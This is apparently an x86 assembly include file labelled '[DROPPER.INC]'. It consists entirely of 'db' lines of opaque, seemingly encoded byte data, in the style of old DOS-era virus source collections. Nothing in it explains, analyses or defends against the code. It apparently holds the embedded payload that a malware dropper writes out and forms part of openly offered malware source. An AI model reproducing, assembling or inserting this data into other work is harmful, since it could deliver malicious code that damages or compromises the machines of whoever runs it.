db 070h, 07Ah, 0C5h, 0D2h, 078h, 0FCh, 00Fh, 0C5h db 098h, 0F8h, 007h, 05Dh, 004h, 0F1h, 01Eh, 03Fh db 0F0h, 088h, 008h, 00Fh, 0E0h, 03Eh, 0A0h, 0C0h db 043h, 003h, 0A5h, 019h, 01Ch, 009h, 00Fh, 046h db 028h, 061h, 053h, 01Fh, 004h, 0E3h, 0FCh, 020h db 099h, 0FEh, 06Ch, 07Fh, 009h, 0B7h, 0E0h, 0E8h db 0F0h, 0A4h, 004h, 078h, 003h, 0D5h, 074h, 004h db 036h, 0F8h, 04Ch, 0EBh, 0E5h, 03Bh, 06Fh, 027h db 0F1h, 048h, 01Fh, 0C5h, 042h, 0C5h, 06Ch, 00Eh db 0C3h, 042h, 013h, 019h, 08Fh, 047h, 048h, 04Ah db 021h, 09Ch, 065h, 0A3h, 0E7h, 013h, 01Dh, 03Fh db 046h, 0D6h, 040h, 0E1h, 005h, 027h, 021h, 038h db 0D3h, 06Eh, 038h, 03Eh, 01Bh, 041h, 06Ah, 08Ah db 00Ch, 021h, 056h, 0DBh, 03Eh, 034h, 0A5h, 066h db 080h, 009h, 0D5h, 041h, 063h, 0A6h, 0F3h, 0D4h db 02Dh, 02Fh, 0A5h, 079h, 041h, 0ABh, 07Fh, 08Eh db 0CAh, 020h, 0B8h, 0C3h, 0DCh, 023h, 0D3h, 055h db 0BEh, 020h, 0DAh, 092h, 05Ah, 096h, 020h, 0E9h db 00Fh, 050h, 005h, 01Eh, 0A2h, 020h, 04Ah, 002h db 095h, 020h, 091h, 042h, 055h, 0DAh, 049h, 020h db 0E2h, 015h, 0B6h, 028h, 042h, 0ABh, 020h, 053h db 0D1h, 020h, 0A5h, 037h, 019h, 08Ah, 020h, 06Dh db 03Eh, 05Fh, 020h, 06Ah, 080h, 05Fh, 04Eh, 011h db 0DAh, 040h, 0B4h, 0C1h, 0A6h, 061h, 0A5h, 07Fh db 06Ah, 041h, 04Ah, 082h, 06Ah, 061h, 03Ch, 057h db 03Fh, 0D5h, 021h, 0DAh, 007h, 092h, 001h, 0B6h db 01Fh, 0A4h, 020h, 0A1h, 05Fh, 0C9h, 0C5h, 0CFh db 0C4h, 06Ch, 042h, 0D5h, 03Ch, 020h, 0B4h, 095h db 0FFh, 048h, 020h, 0BCh, 035h, 043h, 024h, 03Eh db 0DFh, 022h, 053h, 0C5h, 074h, 053h, 0BCh, 040h db 05Ah, 0CBh, 0EFh, 0DAh, 089h, 08Dh, 080h, 041h db 0ADh, 03Eh, 0CDh, 00Dh, 06Ch, 0C5h, 0CFh, 0B7h db 03Dh, 02Bh, 0B7h, 043h, 00Eh, 010h, 0FFh, 094h db 022h, 0ABh, 04Fh, 02Eh, 052h, 0F5h, 032h, 001h db 0FEh, 0E9h, 00Fh, 0C0h, 0AEh, 01Eh, 030h, 08Bh db 03Fh, 0FCh, 0B1h, 044h, 00Fh, 072h, 08Ch, 095h db 004h, 097h, 07Fh, 094h, 074h, 084h, 0B9h, 098h db 04Ch, 089h, 03Fh, 096h, 068h, 043h, 0C0h, 003h db 0BDh, 0CDh, 0E4h, 0F6h, 02Fh, 0CCh, 081h, 009h db 0C0h, 089h, 0F1h, 05Ch, 077h, 042h, 0AFh, 09Fh db 0C7h, 042h, 01Ah, 004h, 032h, 00Bh, 0CBh, 08Eh db 001h, 008h, 013h, 0B8h, 021h, 0DFh, 029h, 017h db 0BAh, 0D3h, 040h, 055h, 01Eh, 0C2h, 093h, 020h db 084h, 065h, 025h, 040h, 065h, 0E1h, 076h, 03Fh db 046h, 0A6h, 041h, 0AEh, 0FAh, 091h, 001h, 04Eh db 014h, 03Fh, 092h, 087h, 0B2h, 03Ah, 020h, 064h db 0FFh, 06Dh, 04Ch, 021h, 00Bh, 0D4h, 007h, 01Fh db 0F3h, 0D9h, 08Ch, 099h, 045h, 051h, 082h, 090h db 00Ah, 0C5h, 00Bh, 055h, 001h, 066h, 05Fh, 033h db 06Eh, 0D9h, 003h, 00Dh, 0FBh, 066h, 09Ch, 018h db 090h, 05Ch, 00Fh, 069h, 01Fh, 02Bh, 041h, 0B5h db 032h, 037h, 020h, 08Dh, 0ADh, 046h, 020h, 042h db 055h, 00Ah, 001h, 0C2h, 0B1h, 0C0h, 0FBh, 04Ch db 020h, 013h, 0DAh, 012h, 06Dh, 096h, 020h, 0EDh db 09Bh, 03Bh, 0EDh, 02Ah, 092h, 013h, 09Ah, 020h db 0AAh, 021h, 041h, 03Ah, 052h, 01Fh, 066h, 055h db 0EDh, 041h, 047h, 013h, 02Ah, 019h, 021h, 051h db 090h, 001h, 0B2h, 083h, 054h, 00Fh, 092h, 020h db 0CAh, 010h, 09Ah, 020h, 0AEh, 021h, 051h, 056h db 0A0h, 055h, 01Fh, 0CAh, 02Ah, 020h, 038h, 040h db 01Fh, 0A6h, 021h, 0E7h, 05Dh, 0C0h, 0A9h, 03Ah db 01Fh, 09Ch, 01Fh, 012h, 0D9h, 08Dh, 02Fh, 0A9h db 043h, 022h, 0CAh, 01Fh, 0CEh, 03Ch, 020h, 052h db 0D9h, 021h, 09Ch, 0E2h, 0ABh, 001h, 0E4h, 055h db 01Fh, 09Ch, 06Bh, 021h, 02Bh, 022h, 0A9h, 01Eh db 02Bh, 01Fh, 0B9h, 0ABh, 00Ah, 021h, 039h, 0C5h db 0CEh, 09Ah, 01Eh, 096h, 01Fh, 0E3h, 049h, 021h db 05Dh, 022h, 055h, 01Eh, 076h, 01Fh, 043h, 0A6h db 063h, 0A2h, 022h, 0E5h, 068h, 029h, 01Fh, 06Ah db 001h, 0B8h, 052h, 022h, 0D4h, 01Eh, 0DCh, 021h db 0CAh, 021h, 06Ah, 022h, 0ABh, 01Eh, 038h, 052h db 05Ah, 052h, 022h, 0B6h, 03Ch, 0A7h, 09Ah, 029h db 01Fh, 04Dh, 018h, 02Eh, 08Eh, 0CDh, 051h, 014h db 05Eh, 040h, 051h, 00Dh, 0ABh, 03Ch, 079h, 0EAh db 001h, 079h, 013h, 0B5h, 004h, 007h, 02Ah, 018h db 057h, 049h, 055h, 0FFh, 04Bh, 01Fh, 09Ah, 002h db 0BAh, 01Eh, 0B9h, 022h, 00Ah, 05Eh, 040h, 09Ah db 069h, 0BFh, 080h, 014h, 00Ah, 0A2h, 0F9h, 0A9h db 0FEh, 001h, 0F4h, 0E1h, 01Eh, 0EEh, 023h, 012h db 010h, 0E3h, 070h, 085h, 0C7h, 03Dh, 01Ah, 01Eh db 0EFh, 02Dh, 07Fh, 003h, 0C2h, 036h, 020h, 0FBh db 03Dh, 071h, 00Ch, 045h, 0E3h, 0DAh, 002h, 079h db 07Fh, 01Bh, 084h, 038h, 037h, 080h, 0FBh, 00Ch db 0A4h, 01Dh, 0A2h, 020h, 08Ah, 001h, 021h, 071h db 037h, 045h, 001h, 065h, 01Eh, 053h, 020h, 014h db 0A6h, 021h, 0B6h, 07Bh, 0C8h, 041h, 00Ch, 04Dh db 04Ah, 059h, 01Fh, 09Ch, 003h, 01Ch, 06Bh, 03Eh db 0B5h, 042h, 015h, 01Dh, 020h, 0D4h, 001h, 08Dh db 016h, 042h, 05Dh, 05Eh, 0D6h, 09Bh, 03Dh, 0BDh db 029h, 020h, 07Ch, 0CAh, 051h, 020h, 0B9h, 079h db 052h, 020h, 06Ah, 085h, 07Fh, 053h, 052h, 041h db 021h, 029h, 037h, 060h, 094h, 0E3h, 080h, 0A9h db 05Dh, 020h, 045h, 03Fh, 036h, 020h, 00Dh, 0A7h db 060h, 036h, 002h, 040h, 055h, 031h, 03Fh, 0D6h db 094h, 0DDh, 0D5h, 042h, 020h, 0E5h, 015h, 021h db 020h, 092h, 054h, 024h, 060h, 0F7h, 048h, 035h db 043h, 034h, 040h, 08Ah, 05Fh, 052h, 020h, 08Eh db 010h, 011h, 09Ah, 0C5h, 0AAh, 07Bh, 0E0h, 0DBh db 0C5h, 036h, 020h, 042h, 048h, 0FBh, 060h, 0B4h db 09Eh, 020h, 04Eh, 0B7h, 0A8h, 055h, 062h, 05Dh db 020h, 023h, 061h, 092h, 02Dh, 0A1h, 0B6h, 042h db 044h, 0C1h, 093h, 0A0h, 06Ah, 01Fh, 05Ah, 087h db 021h, 0FBh, 038h, 024h, 061h, 071h, 073h, 0B8h db 003h, 046h, 0DAh, 044h, 0CBh, 0B2h, 06Fh, 045h db 00Dh, 034h, 01Eh, 0A9h, 052h, 001h, 00Ah, 0BBh db 022h, 085h, 02Ah, 001h, 0EAh, 021h, 0FFh, 042h db 0E0h, 007h, 071h, 0EEh, 012h, 0FCh, 0A2h, 084h db 0E2h, 080h, 007h, 001h, 049h, 0D9h, 051h, 0F2h db 0B2h, 01Ch, 0D1h, 00Ch, 0EAh, 040h, 02Dh, 014h db 000h, 0D5h, 0B1h, 001h, 0B9h, 04Ah, 0A1h, 0E2h db 0F6h, 00Eh, 070h, 09Ah, 00Ch, 092h, 004h, 05Ch db 060h, 043h, 007h, 0D7h, 06Fh, 002h, 0B2h, 0D4h db 062h, 05Ah, 087h, 029h, 0FDh, 005h, 057h, 027h db 05Fh, 0BAh, 00Bh, 08Ah, 010h, 020h, 0B5h, 021h db 01Bh, 020h, 060h, 0FDh, 0A8h, 051h, 0DFh, 0A8h db 021h, 0FFh, 03Ah, 035h, 020h, 05Bh, 021h, 002h db 028h, 040h, 0EBh, 014h, 0ABh, 061h, 053h, 037h db 021h, 06Ah, 007h, 020h, 039h, 0BAh, 0F9h, 0C5h db 0F7h, 0ECh, 067h, 04Eh, 0B0h, 0D4h, 02Ah, 0D5h db 020h, 010h, 0DCh, 0F9h, 04Eh, 096h, 01Bh, 041h db 06Dh, 00Fh, 026h, 008h, 046h, 062h, 011h, 0D4h db 00Ah, 041h, 0D4h, 020h, 06Ah, 0CCh, 09Fh, 04Dh db 038h, 0C7h, 055h, 007h, 044h, 04Dh, 0A3h, 0E6h db 085h, 041h, 0F9h, 025h, 020h, 059h, 052h, 038h db 017h, 0C7h, 0A2h, 0F6h, 09Ah, 020h, 08Ah, 060h db 020h, 0EFh, 014h, 0CDh, 061h, 0E3h, 00Ah, 017h db 096h, 0C7h, 09Eh, 0BFh, 0A4h, 020h, 0D9h, 063h db 040h, 0F9h, 01Dh, 0B6h, 0C2h, 05Ah, 042h, 0DCh db 03Eh, 09Bh, 06Ch, 0B5h, 052h, 01Bh, 020h, 0DCh db 061h, 0A8h, 015h, 033h, 06Ch, 02Ah, 003h, 096h db 051h, 012h, 002h, 0FAh, 08Dh, 020h, 0DEh, 0CBh db 056h, 043h, 040h, 04Eh, 0CDh, 0E2h, 057h, 01Fh db 0FAh, 006h, 029h, 020h, 0EFh, 0F3h, 0A1h, 098h db 0D6h, 093h, 001h, 0D5h, 035h, 00Bh, 03Dh, 020h db 047h, 015h, 0FBh, 0E3h, 092h, 07Ah, 024h, 0AAh db 001h, 0ACh, 064h, 022h, 0F9h, 0A6h, 020h, 0ABh db 021h, 072h, 03Bh, 0A4h, 021h, 0DAh, 013h, 043h db 09Ch, 020h, 0E7h, 0F2h, 08Dh, 01Dh, 044h, 05Dh db 007h, 049h, 083h, 0D3h, 0FDh, 02Dh, 020h, 025h db 0E8h, 0ABh, 03Bh, 007h, 037h, 043h, 0A8h, 028h db 0D6h, 0A5h, 020h, 0BEh, 0C6h, 078h, 085h, 02Ah db 0A2h, 0D4h, 040h, 060h, 0F5h, 03Dh, 001h, 095h db 07Ch, 0F6h, 020h, 072h, 08Ch, 0A9h, 021h, 0F6h db 049h, 003h, 0DEh, 0A9h, 03Fh, 02Eh, 0E9h, 0AAh db 0DCh, 040h, 0EEh, 09Ah, 02Fh, 0A9h, 019h, 02Ah db 0AAh, 01Eh, 026h, 00Eh, 06Ah, 01Fh, 02Bh, 040h db 029h, 082h, 028h, 044h, 090h, 0E3h, 0D3h, 03Fh db 037h, 089h, 03Dh, 03Bh, 0CAh, 0BBh, 060h, 0AAh db 007h, 094h, 001h, 0D4h, 038h, 01Fh, 0DCh, 0E9h db 080h, 0CDh, 0E3h, 0AAh, 0E0h, 002h, 0F1h, 056h db 01Eh, 03Fh, 0A5h, 020h, 06Dh, 006h, 059h, 024h db 059h, 01Fh, 04Eh, 060h, 029h, 0F6h, 004h, 035h db 084h, 066h, 07Ch, 003h, 056h, 0D7h, 020h, 069h db 045h, 0D9h, 09Eh, 045h, 0F9h, 029h, 001h, 04Bh db 020h, 06Ah, 0C9h, 01Eh, 0F3h, 053h, 03Eh, 020h db 099h, 003h, 0DCh, 015h, 054h, 019h, 007h, 08Ah db 0D7h, 020h, 0F3h, 0FCh, 055h, 01Bh, 056h, 01Fh db 073h, 094h, 042h, 0F5h, 071h, 0EDh, 05Fh, 020h db 0B5h, 07Fh, 021h, 029h, 0F7h, 02Ah, 04Dh, 003h db 055h, 007h, 068h, 020h, 01Bh, 0D5h, 086h, 04Ah db 0D2h, 01Fh, 077h, 0B6h, 002h, 043h, 0D4h, 006h db 015h, 0DBh, 00Ch, 052h, 025h, 032h, 07Bh, 09Ah db 030h, 071h, 0ECh, 091h, 0DFh, 0CAh, 022h, 0B6h db 008h, 024h, 0D4h, 042h, 02Eh, 08Fh, 0FFh, 05Bh db 011h, 038h, 044h, 05Dh, 0CAh, 033h, 09Ch, 01Bh db 055h, 01Eh, 040h, 0FFh, 06Ah, 042h, 004h, 05Ch db 0B6h, 042h, 08Dh, 0ACh, 03Fh, 0D4h, 0D3h, 040h db 0DBh, 060h, 055h, 044h, 045h, 04Dh, 063h, 043h db 041h, 00Eh, 06Fh, 002h, 028h, 075h, 013h, 06Ah db 081h, 04Dh, 03Fh, 0D1h, 001h, 0F6h, 096h, 040h db 02Ah, 00Eh, 05Dh, 061h, 0A4h, 040h, 0D4h, 0E1h db 015h, 07Dh, 0A6h, 03Fh, 0FFh, 009h, 052h, 040h db 0F7h, 033h, 0EDh, 01Bh, 005h, 034h, 052h, 026h db 03Fh, 09Bh, 01Eh, 0F5h, 022h, 0FFh, 0D3h, 09Ch db 040h, 0D5h, 07Eh, 07Fh, 094h, 071h, 07Dh, 0A9h db 09Fh, 0D3h, 0FDh, 0D1h, 059h, 040h, 0B5h, 032h db 022h, 02Dh, 03Fh, 0CAh, 093h, 020h, 089h, 0D1h db 007h, 0CAh, 09Ch, 040h, 0A5h, 03Fh, 02Ah, 0A0h db 0ABh, 040h, 03Ah, 002h, 0FFh, 06Dh, 065h, 07Fh db 0C7h, 094h, 069h, 055h, 0A0h, 035h, 040h, 055h db 001h, 03Fh, 0A6h, 061h, 0FBh, 022h, 050h, 053h db 040h, 072h, 0A3h, 026h, 0E7h, 00Ah, 03Fh, 052h db 0AAh, 07Fh, 0FFh, 0B7h, 081h, 0C8h, 0CDh, 054h db 0F2h, 092h, 040h, 093h, 03Fh, 0A5h, 033h, 0DFh db 0EDh, 052h, 0BCh, 040h, 0D4h, 03Fh, 0F4h, 08Dh db 01Fh, 094h, 068h, 0D1h, 040h, 0B2h, 0EDh, 012h db 0B2h, 03Fh, 08Ah, 07Fh, 09Fh, 029h, 040h, 0CAh db 03Fh, 054h, 0A7h, 040h, 0B5h, 01Ch, 069h, 03Fh db 0ABh, 03Eh, 040h, 04Eh, 011h, 0D4h, 03Fh, 092h db 054h, 01Dh, 021h, 094h, 040h, 0A4h, 0D8h, 09Eh db 0F9h, 0A4h, 03Fh, 0E3h, 032h, 081h, 095h, 040h db 093h, 02Dh, 0A7h, 0E2h, 066h, 005h, 0A4h, 0FEh db 0A5h, 022h, 035h, 003h, 09Ah, 00Ah, 07Bh, 0B3h db 017h, 069h, 0ABh, 0F8h, 015h, 029h, 0BFh, 05Ah db 02Fh, 000h, 0A2h, 0CFh, 096h, 004h, 01Fh, 0C7h db 0F8h, 003h, 09Dh, 0C1h, 038h, 009h, 00Fh, 080h db 0F0h, 0E1h, 0FCh, 030h, 00Dh, 0C2h, 097h, 004h db 029h, 001h, 059h, 001h, 05Bh, 004h, 021h, 003h db 0E3h, 007h, 0C0h, 0F3h, 0F0h, 0A7h, 02Dh, 0B6h db 0E1h, 0FCh, 0EBh, 056h, 0CEh, 078h, 060h, 000h ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[DROPPER.INC]ÄÄÄ